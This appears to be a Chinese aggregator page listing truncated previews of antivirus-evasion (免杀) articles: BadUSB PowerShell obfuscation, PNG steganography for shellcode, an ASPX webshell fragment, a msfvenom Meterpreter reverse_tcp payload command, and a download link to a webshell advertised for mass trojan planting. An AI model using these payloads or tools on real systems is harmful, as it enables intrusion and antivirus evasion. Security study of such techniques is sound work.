原文:关于近源渗透测试的免杀

近源渗透测试badusb执行代码的免杀 在进行近源渗透测试的时候,我们发现国内杀软对powershell的管制非常的严格,只要有后台隐藏执行的powershell都会触发可疑行为警报,但是这不代表不能绕过。 生成powershell payload 如图生成payload,我们使用powershell的payload,就不用勾选 位了 powershell混淆 接下来做混淆,否则ps脚本下载下来也 ...

2020-06-16 10:48 0 618 推荐指数:

查看详情

初探之路——方法测试

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担 前言 之前做靶机的时候发现有安全卫士,怎么都突破不了,意识到了的重要性,花点时间来学习一下的技巧,本文分别对exe文件和ps1文件进行测试,所涉及的工具均已 ...

Mon Nov 15 20:05:00 CST 2021 3 4555
一些方法测试

时至今日,我所了解的很多的手段都已经失效了,最近又测试了一些方法(感谢各位大佬的无私奉献,泪目),列举了一些过去相对来说还算可用的办法供参考(绝大多数都过不了的就算了不列举了,这个“绝大多数”是个相对概念,有的能过有的不能) 随着安防产品越来越多、功能越来越强大,在某种意义上来说,防御 ...

Fri Nov 27 19:14:00 CST 2020 0 1746
内网渗透 day10-msfvenom

2-msf 1. 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -f c 2. 生成python脚本 echo ‘密文 ...

Wed Nov 11 19:20:00 CST 2020 0 417
nim-lang 测试:回调函数结合隐写术

nim-lang 测试:回调函数结合隐写术 就是将 shellcode,比如,beacon.bin 隐藏到一张 PNG 图片中,当然要先经过 AES 加密后在嵌入图片。运行时再将 shellcode 提取出来,最终通过回调的方式注入 shellcode。 隐写术 本想直接使用 https ...

Sun May 09 03:57:00 CST 2021 0 290
ASPX

1 <%@ Page Language="Jscript"Debug=true%> <% var a=System.Text.Encoding.GetEncoding(65001).GetString ...

Fri May 11 03:55:00 CST 2018 0 916
2019大马

链接:https://pan.baidu.com/s/1Lba_ycywdJONHHyNWtPxsQ 提取码:1ml8 文件管理,批量挂马,批量清马,批量替换,扫描木马,系统信息,执行命令,组件 ...

Sat Aug 17 06:18:00 CST 2019 0 2322
工具-shecodject

目录 参考 简介 安装 使用 生成shellcode 生成exe 结果 msf监听 效果 参考 https://www.bilibili.com/video/BV1Ae411W7Qe https ...

Thu May 21 04:21:00 CST 2020 0 581
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM